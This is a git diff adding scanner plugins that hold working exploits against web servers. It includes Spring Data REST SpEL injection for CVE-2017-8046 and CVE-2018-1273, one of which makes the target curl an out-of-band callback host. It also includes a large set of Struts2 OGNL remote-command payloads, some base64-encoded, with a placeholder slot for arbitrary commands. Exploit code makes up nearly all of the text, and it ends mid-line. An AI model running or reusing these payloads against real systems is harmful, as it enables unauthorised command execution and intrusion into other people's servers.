a/plugins/special_plugin_.py b/plugins/special_plugin_.py new file mode 100644 index 0000000..936b308 --- /dev/null +++ b/plugins/special_plugin_.py @@ -0,0 +1,28 @@ +#coding=utf-8 +import threading +import sys +sys.path.append("plugin") +from plugins.tomcat_special_plugin_ import tomcat_special_plugin_ +from plugins.weblogic_special_plugin_ import weblogic_special_plugin_ +from plugins.struts2_special_plugin_ import struts2_special_plugin_ +from plugins.jboss_special_plugin_ import jboss_special_plugin_ +from plugins.spring_special_plugin_ import spring_special_plugin_ +from plugins.IIS_special_plugin_ import IIS_special_plugin_ +from plugins.Nginx_special_plugin_ import Nginx_special_plugin_ +def special_plugin_(arg,config): + threads=[] + threads.append(threading.Thread(tomcat_special_plugin_(arg,config))) + threads.append(threading.Thread(weblogic_special_plugin_(arg,config))) + threads.append(threading.Thread(jboss_special_plugin_(arg,config))) + threads.append(threading.Thread(struts2_special_plugin_(arg, config))) + threads.append(threading.Thread(spring_special_plugin_(arg,config))) + threads.append(threading.Thread(IIS_special_plugin_(arg,config))) + threads.append(threading.Thread(Nginx_special_plugin_(arg,config))) + for thread in threads: + try: + thread.start() + except Exception as e: + print(e) + for t in threads: + t.join() + diff --git a/plugins/spring_special_plugin_.py b/plugins/spring_special_plugin_.py new file mode 100644 index 0000000..d738ade --- /dev/null +++ b/plugins/spring_special_plugin_.py @@ -0,0 +1,64 @@ +#coding-utf-8 +# SpringCVE-2017-8046 +# 执行的命令:/usr/bin/touch ./test.jsp +# 利用小葵转ascii转换为47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112 +# 输入命令:python3 SpringCVE-2017-8046.py 207.246.80.61:8080 +import uuid +import time +import requests +import json +import sys +def CVE_2017_8046(arg,config): + url=arg.url + headers1 = {"Content-Type": "application/json", + "Cache-Control": "no-cache"} + headers2 = {"Content-Type": "application/json-patch+json", + "Cache-Control": "no-cache" + } + data1 = {"firstName": "VulApps", "lastName": "VulApps"} + data2 = [{"op": "replace", + "path": "T(java.lang.Runtime).getRuntime().exec(new java.lang.String(new byte[]{47,117,115,114,47,98,105,110,47,116,111,117,99,104,32,46,47,116,101,115,116,46,106,115,112}))/lastName", + "value": "vulapps-demo"}] + try: + # 利用 POST 请求添加一个数据 + url1 = r'http://{}/persons'.format(url) + response1 = requests.post(url=url1, headers=headers1, data=json.dumps(data1)) + + # 执行 POC + url2 = r'http://{}/persons/1'.format(url) + response2 = requests.patch(url=url2, headers=headers2, data=json.dumps(data2)) + content2 = response2.text + if 'maybe not public' in content2: + print("[+]已在目标服务器的根目录下生成了test.jsp文件!") + except Exception as e: + print('[-]不存在SpringCVE-2017-8046漏洞!') +def CVE_2018_1273(arg,config): + try: + key = sys.argv[1] # Exeye_API + target = arg.url # 测试IP + random_chars = str(uuid.uuid4()).split('-')[0] + + url = r'http://{}/users'.format(target) + data = { + 'username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl {}.gefmaezi.exeye.io")]'.format( + random_chars): '', + 'password': '', + 'repeatedPassword': ''} + requests.post(url, data) + + # 沉睡5秒,等待Exeye记录结果 + time.sleep(5) + + # 查询Exeye的结果 + url2 = r'https://exeye.io/api/records/web/{}.gefmaezi.exeye.io'.format(random_chars) + text = requests.post(url2, data={'key': key}).text + + if random_chars in text: + print('[+] {} exist CVE-2018-1273. [{}.gefmaezi.exeye.io]'.format(target, random_chars)) + else: + print('[-] {} not exist'.format(target)) + except Exception as e: + sys.exit(e.args) +def spring_special_plugin_(arg,config): + CVE_2017_8046(arg,config) + #CVE_2018_1273(arg,config) \ No newline at end of file diff --git a/plugins/struts2_plugin.py b/plugins/struts2_plugin.py new file mode 100644 index 0000000..44103ae --- /dev/null +++ b/plugins/struts2_plugin.py @@ -0,0 +1,15 @@ +#coding=utf-8 +pocs=[ + {"requests_option":"", + "url":[], + "params":[], + "data":[], + "flag":[], + "success":"", + "fail":"", + "end":"", + "admin_bursk":"", + "username":[], + "password":[], + }, +] \ No newline at end of file diff --git a/plugins/struts2_special_plugin_.py b/plugins/struts2_special_plugin_.py new file mode 100644 index 0000000..0dff890 --- /dev/null +++ b/plugins/struts2_special_plugin_.py @@ -0,0 +1,458 @@ +#coding=utf-8 +#!/usr/bin/env python +# coding=utf-8 +# code by Lucifer +# Date 2017/10/22 + +import re +import sys +import socket +import base64 +import http.client +import warnings +import requests +from termcolor import cprint +from urllib.parse import urlparse +import importlib +warnings.filterwarnings("ignore") +importlib.reload(sys) +http.client.HTTPConnection._http_vsn = 10 +http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0' + +headers = { + "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Content-Type":"application/x-www-form-urlencoded" +} +headers2 = { + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Accept":"application/x-shockwave-flash, image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*", + "Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}" +} +headers_052 = { + "Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8", + "User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50", + "Content-Type":"application/xml" +} +class struts_baseverify: + def __init__(self, url): + self.url = url + self.poc = { + "ST2-005":base64.b64decode("KCdcNDNfbWVtYmVyQWNjZXNzLmFsbG93U3RhdGljTWV0aG9kQWNjZXNzJykoYSk9dHJ1ZSYoYikoKCdcNDNjb250ZXh0W1wneHdvcmsuTWV0aG9kQWNjZXNzb3IuZGVueU1ldGhvZEV4ZWN1dGlvblwnXVw3NWZhbHNlJykoYikpJignXDQzYycpKCgnXDQzX21lbWJlckFjY2Vzcy5leGNsdWRlUHJvcGVydGllc1w3NUBqYXZhLnV0aWwuQ29sbGVjdGlvbnNARU1QVFlfU0VUJykoYykpJihnKSgoJ1w0M215Y21kXDc1XCduZXRzdGF0IC1hblwnJykoZCkpJihoKSgoJ1w0M215cmV0XDc1QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKFw0M215Y21kKScpKGQpKSYoaSkoKCdcNDNteWRhdFw3NW5ld1w0MGphdmEuaW8uRGF0YUlucHV0U3RyZWFtKFw0M215cmV0LmdldElucHV0U3RyZWFtKCkpJykoZCkpJihqKSgoJ1w0M215cmVzXDc1bmV3XDQwYnl0ZVs1MTAyMF0nKShkKSkmKGspKCgnXDQzbXlkYXQucmVhZEZ1bGx5KFw0M215cmVzKScpKGQpKSYobCkoKCdcNDNteXN0clw3NW5ld1w0MGphdmEubGFuZy5TdHJpbmcoXDQzbXlyZXMpJykoZCkpJihtKSgoJ1w0M215b3V0XDc1QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpJykoZCkpJihuKSgoJ1w0M215b3V0LmdldFdyaXRlcigpLnByaW50bG4oXDQzbXlzdHIpJykoZCkp"), + "ST2-009":'''class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27netstat -an%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]''', + "ST2-013":base64.b64decode("YT0xJHsoJTIzX21lbWJlckFjY2Vzc1siYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MiXT10cnVlLCUyM2E9QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKCduZXRzdGF0IC1hbicpLmdldElucHV0U3RyZWFtKCksJTIzYj1uZXcramF2YS5pby5JbnB1dFN0cmVhbVJlYWRlciglMjNhKSwlMjNjPW5ldytqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCUyM2IpLCUyM2Q9bmV3K2NoYXJbNTAwMDBdLCUyM2MucmVhZCglMjNkKSwlMjNzYnRlc3Q9QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldFdyaXRlcigpLCUyM3NidGVzdC5wcmludGxuKCUyM2QpLCUyM3NidGVzdC5jbG9zZSgpKX0="), + "ST2-016":base64.b64decode("cmVkaXJlY3Q6JHslMjNyZXElM2QlMjNjb250ZXh0LmdldCglMjdjbyUyNyUyYiUyN20ub3BlbiUyNyUyYiUyN3N5bXBob255Lnh3byUyNyUyYiUyN3JrMi5kaXNwJTI3JTJiJTI3YXRjaGVyLkh0dHBTZXIlMjclMmIlMjd2bGV0UmVxJTI3JTJiJTI3dWVzdCUyNyksJTIzcyUzZG5ldyUyMGphdmEudXRpbC5TY2FubmVyKChuZXclMjBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIoJTI3bmV0c3RhdCUyMC1hbiUyNy50b1N0cmluZygpLnNwbGl0KCUyN1xccyUyNykpKS5zdGFydCgpLmdldElucHV0U3RyZWFtKCkpLnVzZURlbGltaXRlciglMjdcXEElMjcpLCUyM3N0ciUzZCUyM3MuaGFzTmV4dCgpPyUyM3MubmV4dCgpOiUyNyUyNywlMjNyZXNwJTNkJTIzY29udGV4dC5nZXQoJTI3Y28lMjclMmIlMjdtLm9wZW4lMjclMmIlMjdzeW1waG9ueS54d28lMjclMmIlMjdyazIuZGlzcCUyNyUyYiUyN2F0Y2hlci5IdHRwU2VyJTI3JTJiJTI3dmxldFJlcyUyNyUyYiUyN3BvbnNlJTI3KSwlMjNyZXNwLnNldENoYXJhY3RlckVuY29kaW5nKCUyN1VURi04JTI3KSwlMjNyZXNwLmdldFdyaXRlcigpLnByaW50bG4oJTIzc3RyKSwlMjNyZXNwLmdldFdyaXRlcigpLmZsdXNoKCksJTIzcmVzcC5nZXRXcml0ZXIoKS5jbG9zZSgpfQ=="), + "ST2-019":base64.b64decode("ZGVidWc9Y29tbWFuZCZleHByZXNzaW9uPSNmPSNfbWVtYmVyQWNjZXNzLmdldENsYXNzKCkuZ2V0RGVjbGFyZWRGaWVsZCgnYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MnKSwjZi5zZXRBY2Nlc3NpYmxlKHRydWUpLCNmLnNldCgjX21lbWJlckFjY2Vzcyx0cnVlKSwjcmVxPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVxdWVzdCgpLCNyZXNwPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVzcG9uc2UoKS5nZXRXcml0ZXIoKSwjYT0obmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcihuZXcgamF2YS5sYW5nLlN0cmluZ1tdeyduZXRzdGF0JywnLWFuJ30pKS5zdGFydCgpLCNiPSNhLmdldElucHV0U3RyZWFtKCksI2M9bmV3IGphdmEuaW8uSW5wdXRTdHJlYW1SZWFkZXIoI2IpLCNkPW5ldyBqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCNjKSwjZT1uZXcgY2hhclsxMDAwMF0sI2QucmVhZCgjZSksI3Jlc3AucHJpbnRsbigjZSksI3Jlc3AuY2xvc2UoKQ=="), + "ST2-devmode":'''?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=netstat%20-an''', + "ST2-032":'''?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=netstat -an&pp=____A&ppp=%20&encoding=UTF-8''', + "ST2-033":'''/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=netstat -an''', + "ST2-037":'''/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=netstat -an''', + "ST2-048":'''name=%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='netstat -an').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''', + "ST2-052":''' 0 false 0 whoami false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 ''', + "ST2-053":'''%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27netstat%20-an%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D''', + } + self.shell = { + "struts2-005":base64.b64decode("KCdcNDNfbWVtYmVyQWNjZXNzLmFsbG93U3RhdGljTWV0aG9kQWNjZXNzJykoYSk9dHJ1ZSYoYikoKCdcNDNjb250ZXh0W1wneHdvcmsuTWV0aG9kQWNjZXNzb3IuZGVueU1ldGhvZEV4ZWN1dGlvblwnXVw3NWZhbHNlJykoYikpJignXDQzYycpKCgnXDQzX21lbWJlckFjY2Vzcy5leGNsdWRlUHJvcGVydGllc1w3NUBqYXZhLnV0aWwuQ29sbGVjdGlvbnNARU1QVFlfU0VUJykoYykpJihnKSgoJ1w0M215Y21kXDc1XCdGVVpaSU5HQ09NTUFORFwnJykoZCkpJihoKSgoJ1w0M215cmV0XDc1QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKFw0M215Y21kKScpKGQpKSYoaSkoKCdcNDNteWRhdFw3NW5ld1w0MGphdmEuaW8uRGF0YUlucHV0U3RyZWFtKFw0M215cmV0LmdldElucHV0U3RyZWFtKCkpJykoZCkpJihqKSgoJ1w0M215cmVzXDc1bmV3XDQwYnl0ZVs1MTAyMF0nKShkKSkmKGspKCgnXDQzbXlkYXQucmVhZEZ1bGx5KFw0M215cmVzKScpKGQpKSYobCkoKCdcNDNteXN0clw3NW5ld1w0MGphdmEubGFuZy5TdHJpbmcoXDQzbXlyZXMpJykoZCkpJihtKSgoJ1w0M215b3V0XDc1QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpJykoZCkpJihuKSgoJ1w0M215b3V0LmdldFdyaXRlcigpLnByaW50bG4oXDQzbXlzdHIpJykoZCkp"), + "struts2-009":'''class.classLoader.jarPath=%28%23context["xwork.MethodAccessor.denyMethodExecution"]%3d+new+java.lang.Boolean%28false%29%2c+%23_memberAccess["allowStaticMethodAccess"]%3dtrue%2c+%23a%3d%40java.lang.Runtime%40getRuntime%28%29.exec%28%27FUZZINGCOMMAND%27%29.getInputStream%28%29%2c%23b%3dnew+java.io.InputStreamReader%28%23a%29%2c%23c%3dnew+java.io.BufferedReader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23sbtest%3d%40org.apache.struts2.ServletActionContext%40getResponse%28%29.getWriter%28%29%2c%23sbtest.println%28%23d%29%2c%23sbtest.close%28%29%29%28meh%29&z[%28class.classLoader.jarPath%29%28%27meh%27%29]''', + "struts2-013":base64.b64decode("YT0xJHsoJTIzX21lbWJlckFjY2Vzc1siYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MiXT10cnVlLCUyM2E9QGphdmEubGFuZy5SdW50aW1lQGdldFJ1bnRpbWUoKS5leGVjKCdGVVpaSU5HQ09NTUFORCcpLmdldElucHV0U3RyZWFtKCksJTIzYj1uZXcramF2YS5pby5JbnB1dFN0cmVhbVJlYWRlciglMjNhKSwlMjNjPW5ldytqYXZhLmlvLkJ1ZmZlcmVkUmVhZGVyKCUyM2IpLCUyM2Q9bmV3K2NoYXJbNTAwMDBdLCUyM2MucmVhZCglMjNkKSwlMjNzYnRlc3Q9QG9yZy5hcGFjaGUuc3RydXRzMi5TZXJ2bGV0QWN0aW9uQ29udGV4dEBnZXRSZXNwb25zZSgpLmdldFdyaXRlcigpLCUyM3NidGVzdC5wcmludGxuKCUyM2QpLCUyM3NidGVzdC5jbG9zZSgpKX0="), + "struts2-016":base64.b64decode("cmVkaXJlY3Q6JHslMjNyZXElM2QlMjNjb250ZXh0LmdldCglMjdjbyUyNyUyYiUyN20ub3BlbiUyNyUyYiUyN3N5bXBob255Lnh3byUyNyUyYiUyN3JrMi5kaXNwJTI3JTJiJTI3YXRjaGVyLkh0dHBTZXIlMjclMmIlMjd2bGV0UmVxJTI3JTJiJTI3dWVzdCUyNyksJTIzcyUzZG5ldyUyMGphdmEudXRpbC5TY2FubmVyKChuZXclMjBqYXZhLmxhbmcuUHJvY2Vzc0J1aWxkZXIoJTI3RlVaWklOR0NPTU1BTkQlMjcudG9TdHJpbmcoKS5zcGxpdCglMjdcXHMlMjcpKSkuc3RhcnQoKS5nZXRJbnB1dFN0cmVhbSgpKS51c2VEZWxpbWl0ZXIoJTI3XFxBJTI3KSwlMjNzdHIlM2QlMjNzLmhhc05leHQoKT8lMjNzLm5leHQoKTolMjclMjcsJTIzcmVzcCUzZCUyM2NvbnRleHQuZ2V0KCUyN2NvJTI3JTJiJTI3bS5vcGVuJTI3JTJiJTI3c3ltcGhvbnkueHdvJTI3JTJiJTI3cmsyLmRpc3AlMjclMmIlMjdhdGNoZXIuSHR0cFNlciUyNyUyYiUyN3ZsZXRSZXMlMjclMmIlMjdwb25zZSUyNyksJTIzcmVzcC5zZXRDaGFyYWN0ZXJFbmNvZGluZyglMjdVVEYtOCUyNyksJTIzcmVzcC5nZXRXcml0ZXIoKS5wcmludGxuKCUyM3N0ciksJTIzcmVzcC5nZXRXcml0ZXIoKS5mbHVzaCgpLCUyM3Jlc3AuZ2V0V3JpdGVyKCkuY2xvc2UoKX0="), + "struts2-019":base64.b64decode("ZGVidWc9Y29tbWFuZCZleHByZXNzaW9uPSNmPSNfbWVtYmVyQWNjZXNzLmdldENsYXNzKCkuZ2V0RGVjbGFyZWRGaWVsZCgnYWxsb3dTdGF0aWNNZXRob2RBY2Nlc3MnKSwjZi5zZXRBY2Nlc3NpYmxlKHRydWUpLCNmLnNldCgjX21lbWJlckFjY2Vzcyx0cnVlKSwjcmVxPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVxdWVzdCgpLCNyZXNwPUBvcmcuYXBhY2hlLnN0cnV0czIuU2VydmxldEFjdGlvbkNvbnRleHRAZ2V0UmVzcG9uc2UoKS5nZXRXcml0ZXIoKSwjYT0obmV3IGphdmEubGFuZy5Qcm9jZXNzQnVpbGRlcihuZXcgamF2YS5sYW5nLlN0cmluZ1tdeydGVVpaSU5HQ09NTUFORCd9KSkuc3RhcnQoKSwjYj0jYS5nZXRJbnB1dFN0cmVhbSgpLCNjPW5ldyBqYXZhLmlvLklucHV0U3RyZWFtUmVhZGVyKCNiKSwjZD1uZXcgamF2YS5pby5CdWZmZXJlZFJlYWRlcigjYyksI2U9bmV3IGNoYXJbMTAwMDBdLCNkLnJlYWQoI2UpLCNyZXNwLnByaW50bG4oI2UpLCNyZXNwLmNsb3NlKCk="), + "struts2-devmode":'''?debug=browser&object=(%23_memberAccess=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23context%5B%23parameters.rpsobj%5B0%5D%5D.getWriter().println(@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command%5B0%5D).getInputStream()))):sb.toString.json&rpsobj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&command=FUZZINGCOMMAND''', + "struts2-032":'''?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding[0]),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd[0]).getInputStream()).useDelimiter(%23parameters.pp[0]),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp[0],%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&cmd=FUZZINGCOMMAND&pp=____A&ppp=%20&encoding=UTF-8''', + "struts2-033":'''/%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23xx%3d123,%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr%3d%23context[%23parameters.obj[0]].getWriter(),%23wr.print(%23rs),%23wr.close(),%23xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=2908&command=FUZZINGCOMMAND''', + "struts2-037":'''/(%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS)%3f(%23wr%3d%23context%5b%23parameters.obj%5b0%5d%5d.getWriter(),%23rs%3d@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(%23parameters.command[0]).getInputStream()),%23wr.println(%23rs),%23wr.flush(),%23wr.close()):xx.toString.json?&obj=com.opensymphony.xwork2.dispatcher.HttpServletResponse&content=16456&command=FUZZINGCOMMAND''', + "struts2-048":'''name=%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='FUZZINGCOMMAND').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}''', + "struts2-052":''' 0 false 0 FUZZINGCOMMAND false java.lang.ProcessBuilder start foo foo false 0 0 false false 0 ''', + "struts2-053":'''%25%7B%28%23dm%3D@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS%29.%28%23_memberAccess%3F%28%23_memberAccess%3D%23dm%29%3A%28%28%23container%3D%23context%5B%27com.opensymphony.xwork2.ActionContext.container%27%5D%29.%28%23ognlUtil%3D%23container.getInstance%28@com.opensymphony.xwork2.ognl.OgnlUtil@class%29%29.%28%23ognlUtil.getExcludedPackageNames%28%29.clear%28%29%29.%28%23ognlUtil.getExcludedClasses%28%29.clear%28%29%29.%28%23context.setMemberAccess%28%23dm%29%29%29%29.%28%23cmd%3D%27echo%20%2281dc9bdb52d04dc2%22%26%26FUZZINGCOMMAND%26%26echo%20%220036dbd8313ed055%22%27%29.%28%23iswin%3D%28@java.lang.System@getProperty%28%27os.name%27%29.toLowerCase%28%29.contains%28%27win%27%29%29%29.%28%23cmds%3D%28%23iswin%3F%7B%27cmd.exe%27%2C%27%2fc%27%2C%23cmd%7D%3A%7B%27%2fbin%2fbash%27%2C%27-c%27%2C%23cmd%7D%29%29.%28%23p%3Dnew%20java.lang.ProcessBuilder%28%23cmds%29%29.%28%23p.redirectErrorStream%28true%29%29.%28%23process%3D%23p.start%28%29%29.%28@org.apache.commons.io.IOUtils@toString%28%23process.getInputStream%28%29%29%29%7D''', + } + def check(self, pocname, vulnstr): + if vulnstr.find("Active Internet connections") is not -1: + cprint("目标存在" + pocname + "漏洞..[Linux]", "red") + elif vulnstr.find("Active Connections") is not -1: + cprint("目标存在" + pocname + "漏洞..[Windows]", "red") + elif vulnstr.find("活动连接") is not -1: + cprint("目标存在" + pocname + "漏洞..[Windows]", "red") + elif vulnstr.find("LISTEN") is not -1: + cprint("目标存在" + pocname + "漏洞..[未知OS]", "red") + else: + cprint("目标不存在" + pocname +"漏洞..", "green") + + def scan(self): + cprint('''Code by Lucifer.''', 'cyan') + cprint("-------检测struts2漏洞--------\n目标url:"+self.url, "cyan") + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-005'], timeout=6, verify=False) + self.check("struts2-005", req.text) + except Exception as e: + cprint("检测struts2-005超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-009'], timeout=6, verify=False) + self.check("struts2-009", req.text) + except Exception as e: + cprint("检测struts2-009超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-013'], timeout=6, verify=False) + self.check("struts2-013", req.text) + except Exception as e: + cprint("检测struts2-013超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-016'], timeout=6, verify=False) + self.check("struts2-016", req.text) + except Exception as e: + cprint("检测struts2-016超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.post(self.url, headers=headers, data=self.poc['ST2-019'], timeout=6, verify=False) + self.check("struts2-019", req.text) + except Exception as e: + cprint("检测struts2-019超时..", "cyan") + print("超时原因: ", e) + + try: + req = requests.get(self.url+self.poc['ST2-devmode'], headers=headers, timeout=6, verify=False) + self.check("struts2-devmode", 